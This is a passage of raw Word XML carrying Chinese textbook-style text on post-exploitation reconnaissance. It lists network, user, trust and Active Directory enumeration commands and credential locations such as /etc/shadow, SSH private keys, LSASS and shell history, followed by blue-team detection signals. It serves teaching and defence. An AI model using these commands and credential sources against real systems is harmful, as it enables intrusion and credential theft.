        </w:rPr>
        <w:t xml:space="preserve">addr`的输出中，路由表可通过`/sbin/route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-n`或`/sbin/ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">route`查看，ARP缓存在`/proc/net/arp`中，DNS配置在`/etc/resolv.conf`中，当前用户信息通过`/usr/bin/id`获取。这些命令都不是漏洞利用，而是操作系统的正常功能——只是使用它们的人换成了攻击者。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这一事实对蓝队检测提出了根本性挑战：信息收集行为与正常系统管理行为高度相似。一个管理员登录系统后查看网络配置，与攻击者登录后做同样的事情，在命令层面几乎没有区别。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**信息收集的分类与典型目标**</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后渗透信息收集可以按照收集目标分为以下几个维度：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**一、网络环境信息**</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络环境信息回答"我在哪里"和"我可以到哪里"的问题。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**接口与地址**：通过`ifconfig`（Linux）或`ipconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/all`（Windows）获取当前主机的IP地址、子网掩码、MAC地址、网卡数量。多网卡是内网枢轴的关键条件——如果当前主机同时连接外网和内网，它就是天然的跳板机①。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**路由表**：通过`route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-n`（Linux）或`route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">print`（Windows）获取路由信息，判断可到达的网络段以及默认网关位置①。路由表告诉攻击者：哪些子网是通过当前主机可以路由到达的。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**ARP缓存**：通过`arp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-a`（Linux/Windows通用）查看最近与本机通信的主机列表①。ARP表中出现的IP-MAC对说明这些主机在同一个广播域内，是内网横向移动的优先目标。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**DNS配置与名称解析**：通过`cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/resolv.conf`（Linux）或`ipconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/displaydns`（Windows）获取DNS服务器地址和本地DNS缓存。DNS服务器是内网核心基础设施，了解其位置对后续攻击有帮助①。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**二、主机与服务发现**</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">主机发现回答"网络中还有哪些活着的机器"，服务发现回答"这些机器上运行着什么"。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**ICMP探测**：通过`ping`扫描C类或B类子网中的存活主机。这是最古老也最简单的存活检测方法，但ICMP流量容易被防火墙阻挡或IDS记录①。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**TCP/UDP端口扫描**：通过端口扫描工具探测特定主机上开放的服务端口，判断服务类型和版本②。由于后渗透环境中可能没有安装Nmap等专业扫描工具，攻击者可能使用`/dev/tcp`（bash内建功能）、netcat、PowerShell的`Test-NetConnection`等替代手段进行简单端口探测③。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**NetBIOS/LLMNR/mDNS**：Windows网络中的NetBIOS名称服务（UDP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">137）、LLMNR（Link-Local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Multicast Name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Resolution）和Linux/macOS中的mDNS（Multicast</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS, UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">5353）可以实现去中心化的名称解析。攻击者可以通过侦听这些协议的多播/广播消息来发现内网中的主机和服务，而无需主动发送探测包③。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**三、用户与凭据信息**</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用户与凭据信息回答"谁在这里"和"我有谁的钥匙"。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**当前用户与权限组**：通过`id`、`whoami`（Linux）或`whoami</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/all`（Windows）查看当前用户身份及其所属组①。本地管理员组（Linux:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">`sudo`组/`wheel`组；Windows:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">`Administrators`组）的成员资格对后续提权至关重要。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**其他已登录用户**：通过`w`、`who`、`last`（Linux）或`query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">user`（Windows）查看当前系统中其他已登录的用户①。这些用户可能是更高权限的域管理员，其会话中可能存储着可窃取的凭据。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**密码文件与凭据存储**：Linux系统中的`/etc/shadow`（仅root可读）存储了密码哈希；`~/.ssh/`目录存储了SSH私钥和已知主机公钥列表。Windows系统中，LSASS（Local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Security Authority Subsystem </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Service）进程内存中缓存用户凭据，凭据管理器（Credential</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Manager）存储了RDP、网络共享等服务密码②。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**历史命令**：`~/.bash_history`、`~/.mysql_history`、`~/.psql_history`等文件中可能保存了包含密码的命令行历史（如`mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-pPASSWORD`）②。这是信息收集中经常被忽视但极有价值的来源。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**四、信任关系与访问链路**</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">信任关系回答"我和谁有直接连线"。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**SSH信任**：`~/.ssh/authorized_keys`文件列出了可以免密登录当前主机的公钥；`~/.ssh/known_hosts`记录了当前用户曾经连接过的主机①。如果攻击者获取了当前用户的私钥（`~/.ssh/id_rsa`），就可以免密登录`authorized_keys`中配置了对应公钥的所有主机。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**NFS/CIFS挂载**：`showmount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;NFS_SERVER&gt;`或`/etc/fstab`中记录的挂载点暴露了网络存储服务器的地址和共享路径①。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**数据库与应用程序连接**：Web应用程序的配置文件（如`config.php`、`settings.py`、`application.properties`）通常包含数据库服务器的IP、端口、用户名和明文密码②。这些凭据可能被复用于其他系统。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**五、域环境信息（Active</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Directory环境特化）**</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如果当前主机是Active</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Directory域的成员，攻击者还需要收集域环境信息：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**域控制器位置**：通过`nltest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/dclist:&lt;DOMAIN&gt;`或`set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">logon`可以获取域控制器的主机名和IP地址②。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**域用户与组枚举**：通过`net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/domain`和`net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> group </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/domain`列出域用户和域组②。Domain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Admins、Enterprise </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Admins等组的成员是攻击者的高价值目标。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**组策略与OU结构**：了解组织单位（Organizational</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unit, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">OU）结构和组策略对象（Group</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Policy Object, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">GPO）的应用范围，有助于判断哪些主机可能共享相同的配置和安全策略②。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以上信息收集技术的具体命令和参数因操作系统版本、系统配置、权限级别而异②。在实际的授权渗透测试中，命令的输出取决于具体的目标环境，不存在"一键通"的万能枚举方法。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**信息收集的检测难度分析**</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从蓝队视角看，信息收集行为产生的事件流与正常系统管理活动高度重合。但在特定场景下，以下信号值得关注：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**异常的进程链**：Web服务器进程（如Apache/IIS的www-data用户）突然执行`ipconfig`或`arp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-a`命令，这在正常业务中极少发生②。进程父子关系是重要的检测特征——一个Web应用进程（通过反序列化漏洞或命令注入被利用后）派生出信息收集子进程，这种进程链在正常系统中不会出现。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**短时间内大量系统命令集中执行**：正常管理员不会在数秒内依次执行`ifconfig`→`arp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a`→`route -n`→`cat /etc/shadow`→`net user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/domain`这一整套命令。命令执行的密集度和组合模式是行为检测的关键指标②。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**非交互式shell中的信息收集**：许多命令在被非交互式shell执行时的行为与交互式环境不同。例如，`whoami`在非交互式环境中不会产生任何终端输出到日志，但其命令执行本身可能被审计机制捕获②。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**检测对照框：后渗透信息收集的蓝队检测**</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测策略（分层组合使用，单层不可靠）：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端点审计与进程监控：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过sysmon（Linux）或Sysinternals</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Sysmon（Windows）监控进程创建事件（Event</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
